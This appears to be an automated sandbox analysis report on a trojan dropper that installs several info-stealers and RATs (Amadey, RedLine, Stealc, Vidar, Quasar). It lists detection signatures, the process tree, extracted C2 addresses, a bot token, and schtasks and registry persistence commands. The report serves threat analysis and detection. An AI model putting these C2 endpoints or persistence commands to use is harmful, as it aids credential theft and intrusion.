Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mlk3kK6uLZ.exe

Overview

General Information

Sample name:mlk3kK6uLZ.exe
renamed because original name is a hash value
Original sample name:b85fa0d79d936b8b006c535d006c7f29.exe
Analysis ID:1472622
MD5:b85fa0d79d936b8b006c535d006c7f29
SHA1:210085d4f3cf1cf08c34baa5bfba0b0fc5a6c639
SHA256:170004b7b6bab6c3c860a6402f9d3d8988e4f3de7682e28738c3c27ac33b0e1c
Tags:32exetrojan
Infos:

Detection

Amadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected Quasar RAT
Yara detected RedLine Stealer
Yara detected Stealc
Yara detected Vidar stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Reads the System eventlog
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: System File Execution Location Anomaly
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • mlk3kK6uLZ.exe (PID: 4436 cmdline: "C:\Users\user\Desktop\mlk3kK6uLZ.exe" MD5: B85FA0D79D936B8B006C535D006C7F29)
    • axplong.exe (PID: 760 cmdline: "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe" MD5: B85FA0D79D936B8B006C535D006C7F29)
  • axplong.exe (PID: 6360 cmdline: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe MD5: B85FA0D79D936B8B006C535D006C7F29)
    • leg222.exe (PID: 6472 cmdline: "C:\Users\user\AppData\Local\Temp\1000160001\leg222.exe" MD5: 5486FD5B8200F34B23F23A21F8912ADE)
      • RegAsm.exe (PID: 6768 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • Z73fDV6g4L.exe (PID: 6220 cmdline: "C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe" MD5: 1B75671FB234AE1FB72406A317FA752A)
          • conhost.exe (PID: 4952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • VP2pdCInvS.exe (PID: 4512 cmdline: "C:\Users\user\AppData\Roaming\VP2pdCInvS.exe" MD5: 15A7CAE61788E4718D3C33ABB7BE6436)
      • WerFault.exe (PID: 4456 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 284 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • hello.exe (PID: 7396 cmdline: "C:\Users\user\AppData\Local\Temp\1000202001\hello.exe" MD5: 2EB71684C81D24144953FE0F6F5B392C)
      • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • aspnet_regiis.exe (PID: 7464 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
    • build16666.exe (PID: 7516 cmdline: "C:\Users\user\AppData\Local\Temp\1000210001\build16666.exe" MD5: 4640FAEAFA95CE219C649E9F5CBFFD75)
    • Freshbuild.exe (PID: 7612 cmdline: "C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exe" MD5: 07101CAC5B9477BA636CD8CA7B9932CB)
      • Hkbsse.exe (PID: 7684 cmdline: "C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe" MD5: 07101CAC5B9477BA636CD8CA7B9932CB)
    • newstart.exe (PID: 2672 cmdline: "C:\Users\user\AppData\Local\Temp\1000240001\newstart.exe" MD5: A20FC3377C07AA683A47397F9F5FF355)
    • see.exe (PID: 1868 cmdline: "C:\Users\user\AppData\Local\Temp\1000241001\see.exe" MD5: CD65AA14F5B3B1C266D82BA09B42FF86)
    • ZharkBOT.exe (PID: 6308 cmdline: "C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exe" MD5: CD2DD54E31B33E1FEDECED94367CD942)
      • schtasks.exe (PID: 7224 cmdline: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN espartu.exe /TR "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 3364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • espartu.exe (PID: 3724 cmdline: "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe" MD5: CD2DD54E31B33E1FEDECED94367CD942)
  • svchost.exe (PID: 6524 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 5900 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6472 -ip 6472 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 2300 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 4332 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6120 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Hkbsse.exe (PID: 8112 cmdline: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe MD5: 07101CAC5B9477BA636CD8CA7B9932CB)
  • Hkbsse.exe (PID: 2448 cmdline: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe MD5: 07101CAC5B9477BA636CD8CA7B9932CB)
  • espartu.exe (PID: 3992 cmdline: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe MD5: CD2DD54E31B33E1FEDECED94367CD942)
  • espartu.exe (PID: 5512 cmdline: "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe" MD5: CD2DD54E31B33E1FEDECED94367CD942)
    • schtasks.exe (PID: 2516 cmdline: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN espartu.exe /TR "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 4592 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • FRaqbC8wSA1XvpFVjCRGryWt.exe (PID: 2020 cmdline: "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe" MD5: E634EE541D4D4911DABDDAC835517559)
      • schtasks.exe (PID: 2700 cmdline: "schtasks" /create /SC MINUTE /MO 1 /TN "svchost" /tr "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe" /rl HIGHEST /f MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 3092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • svchost.exe (PID: 1772 cmdline: "C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe" MD5: E634EE541D4D4911DABDDAC835517559)
        • schtasks.exe (PID: 7332 cmdline: MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 3876 cmdline: MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • espartu.exe (PID: 2704 cmdline: "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe" MD5: CD2DD54E31B33E1FEDECED94367CD942)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
Quasar RAT, QuasarRATQuasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://85.28.47.70/570d5d5e8678366c.php"}
{"C2 url": "http://85.28.47.70/570d5d5e8678366c.php"}
{"Version": "1.4.0", "Host:Port": "45.66.231.158:45764;", "SubDirectory": "Microsoft Windows", "InstallName": "svchost.exe", "MutexName": "80038a66-0dbb-4135-8eb1-4ce5a34ce41b", "StartupKey": "svchost", "Tag": "Proxy", "LogDirectoryName": "svchostetw", "ServerSignature": "DBA8F0Br++WlVnwMY+TOW3OLUcEzXGeCEpOjr8WUkG+2zCAq/kjzFN0ynUG7fVZJ2WnLgRMFCsnq+tQUyVRlD2d5OlDSd/89AGgSVE2v9+GKNyc798YKw+I8C5fQOSMPFpDgKf5dKMZdCkGYH88RdlMVn+P2IZysmei7aIdaN6ozqMBSJ3dYDd32Gz/nEv0PfLO8IH2gEmckMn0ox5+a1nQqWprOyOIvEwmwXM4zUb60JA3vXdZgUOqa8bXTE61J00WpLHW7n+ovTcw9xf6BrZayMnbNSF4c43JzJg8GPjLxCYEz4+4yc+T8TMveGuOTcMBoF6oh/rl43wMyyUWF6AqFMjQumJfK27M9e/Wt6/eym/Ny3Os3EA4F8rQjOEXaXg1n6VwK673sq38YoOFcOxJoBi7dwGCJ4nzNfFDgie/wOGhfen9yfDxk9+TXmKq2vsVjbElYLuFTnj/97F0vhIy6r4GoJyckl6ueQ89BUx5BJZuxY+Ne9C7v0qRhPNAasRpGjp/+Z9bQOvzTJKp1qFsQjtBRVxBycTB1ot1jg1jEBnZ/Iz+gT1GqQTeJ0vvsFjJcm7PwI3lJ+lzd9fhixiWe77RTDl8B4sDgf6+1WkUd//2uAnhNIJt81NkDMmmpjYbygCBOnGGY4qyqKgDsTtS+QZS1vUCgN8VZTlofKZY=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAMfljgRljIw8eG6/KAHpETANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MDcwOTE5MTA0OFoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAhkNgzYkaEwf7PBmR34/tzDkjeq0EJR6st02BJKB6Pn0eymJW5ztCKBjJWcj7ostsw1a8yLjTRhlPG2yTbAptsqGR7yW4Vx5EcTnJN1gnpbsHwMV0Nt46dJUsXGzDmSnMeazOYj9kusu/ppQkNYizfvV4De9PrDSyr/buwR4wWMZ/VpIW4LYCSKfrR/MhCV+RoWrr9hEYAw239t3sCQxo1aXlje5PyfqMXfjsHpecZazN08hwj3Rt08LVr3X8PZAn+mEqltOhyp+dEbQYK8S/2DYVp5OrTrRSrbY8cl06nAKMAPXobfLQ1yn9CnlwMUyV+B7GU0wWCK0JsUrfczniucg4bAGnQY+fAwnmM4LT/5T6wZlBgJABkyRW02Vi7vKtU+FQTpBq7lWVZIc5zJXgavwJl+WF7xwdNG/aiDItl2gZ7AqhS6zXo6+jmYUt1Tz5NgVjxtEZPEZ3SmMWYIYmBN4De8cP6wdv70w0csE65l3eyOpTf6Ez24x14kqk+dBzn3DH/wSSW6Y3XY/Fx3TL596pw+rOCD9OQx5SkYwEm39k3LZxvPSkbXrGTemBi12Khp23CypLECFMNYooDz+/5pLVwrRqkXEqaHYpeQ3F0uYlJwzlWVGZRtSg1vKkfrsR3f9/zaEvwMhhjx/xf+qXBvHkqEav9yJKYF8FI+Vf0jcCAwEAAaMyMDAwHQYDVR0OBBYEFPZB8zAaPEqcMz49Nz1nOdAlp926MA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAAAxAkkSUk3Kt0Auf6XkCxIqotC09vm7t3YkEiQXeEA6YUTSBorR9g1WMAqxBQys9A5TFGUEOukXrVVpTljXKiWo5FzVptTd+dXTgu+KmhVEOobIaAiXvyccvRZcv6b/+bvG6Mag7bU8+hxwMHpne2DbOHO9ediM8FPK0uNEvQbYjJczQEOzJBdUQt4tNEn9vzJNH5a4JF1MJ0FAYR7B7gjuC+7jgFIrjioNyWfF0WktB38DGWxYKwl5kvq0KoZdwrNPlm2cceBnf9fHSyvRjfCbQXZ+voLsp2O9QAKYxy3zrLGsLZ313jI0h9pwySVxI+Pv7LYcBnJbg6843wjV3Sp13KUJDn944Nzxkwy76VOTCtb+/lZg3xZ5H1c1AlHlP0WqfpQV+L97HOO+PYBDKNGfU/ZcsQfUdWfboIueM85bxeIIjbhIn471OrVUCs13j67bSGtZkhpuhd2jyfiEU5koRWFPQZjEt7vbfAHFRh6mnFk1B4Jm7yZK3VHd360QFwEc6EKxQ18kh6TEK15D7l+/oUd3uIOM/WqkQzfW2QVkL943vW1pzaobeM3lcoOXVMV1dFnyXOi8/u/0++oc9vRjwLY6RvHGGqjTIWRsO1ULsoaMi7o9NtHE+vfDYe+f3+4TYlBB7Z+WpQc6lCqgFk/aZnoR0tYWs2gd1G23+691"}
{"C2 url": "185.172.128.116/Mb3GvQs8/index.php", "Version": "4.30"}
{"C2 url": ["185.172.128.33:8970"], "Bot Id": "@LOGSCLOUDYT_BOT", "Authorization Header": "3b888690d495b9792a58ef1c36d35d19"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
          C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeMALWARE_Win_zgRATDetects zgRATditekSHen
            • 0x4af61:$s1: file:///
            • 0x4ae99:$s2: {11111-22222-10009-11112}
            • 0x4aef1:$s3: {11111-22222-50001-00000}
            • 0x47bc8:$s4: get_Module
            • 0x41c7b:$s5: Reverse
            • 0x42a30:$s6: BlockCopy
            • 0x41c67:$s7: ReadByte
            • 0x4af73:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
            C:\Users\user\AppData\Roaming\VP2pdCInvS.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              SourceRuleDescriptionAuthorStrings
              00000003.00000003.2036875774.0000000004B30000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                0000000B.00000000.2095785467.0000000000892000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  00000019.00000000.3774634677.0000000000EC2000.00000002.00000001.01000000.0000001A.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    00000017.00000000.2792505057.0000000000E01000.00000020.00000001.01000000.00000019.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      00000005.00000002.2098178516.0000000000479000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        Click to see the 45 entries
                        SourceRuleDescriptionAuthorStrings
                        5.2.RegAsm.exe.482040.2.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          5.2.RegAsm.exe.482040.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                            5.2.RegAsm.exe.482040.2.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
                            • 0x49161:$s1: file:///
                            • 0x49099:$s2: {11111-22222-10009-11112}
                            • 0x490f1:$s3: {11111-22222-50001-00000}
                            • 0x45dc8:$s4: get_Module
                            • 0x3fe7b:$s5: Reverse
                            • 0x40c30:$s6: BlockCopy
                            • 0x3fe67:$s7: ReadByte
                            • 0x49173:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
                            18.2.hello.exe.6c3a3000.4.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                              18.2.hello.exe.6c3a3000.4.raw.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                                Click to see the 44 entries

                                System Summary

                                barindex
                                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, ProcessId: 2020, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe
                                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exe, ProcessId: 6308, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\espartu.exe
                                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 8.213.137.155, DestinationIsIpv6: false, DestinationPort: 10101, EventID: 3, Image: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe, Initiated: true, ProcessId: 1772, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 59420
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe", CommandLine: "C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe, ParentCommandLine: "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe", ParentImage: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, ParentProcessId: 2020, ParentProcessName: FRaqbC8wSA1XvpFVjCRGryWt.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe", ProcessId: 1772, ProcessName: svchost.exe
                                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 43.153.49.49, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe, Initiated: true, ProcessId: 6360, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 58985
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exe, ProcessId: 6308, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\espartu.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN espartu.exe /TR "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe" /F, CommandLine: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN espartu.exe /TR "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exe, ParentProcessId: 6308, ParentProcessName: ZharkBOT.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN espartu.exe /TR "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe" /F, ProcessId: 7224, ProcessName: schtasks.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN espartu.exe /TR "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe" /F, CommandLine: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN espartu.exe /TR "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exe, ParentProcessId: 6308, ParentProcessName: ZharkBOT.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN espartu.exe /TR "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe" /F, ProcessId: 7224, ProcessName: schtasks.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe", CommandLine: "C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe, ParentCommandLine: "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe", ParentImage: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, ParentProcessId: 2020, ParentProcessName: FRaqbC8wSA1XvpFVjCRGryWt.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe", ProcessId: 1772, ProcessName: svchost.exe
                                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 6524, ProcessName: svchost.exe

                                Persistence and Installation Behavior

                                barindex
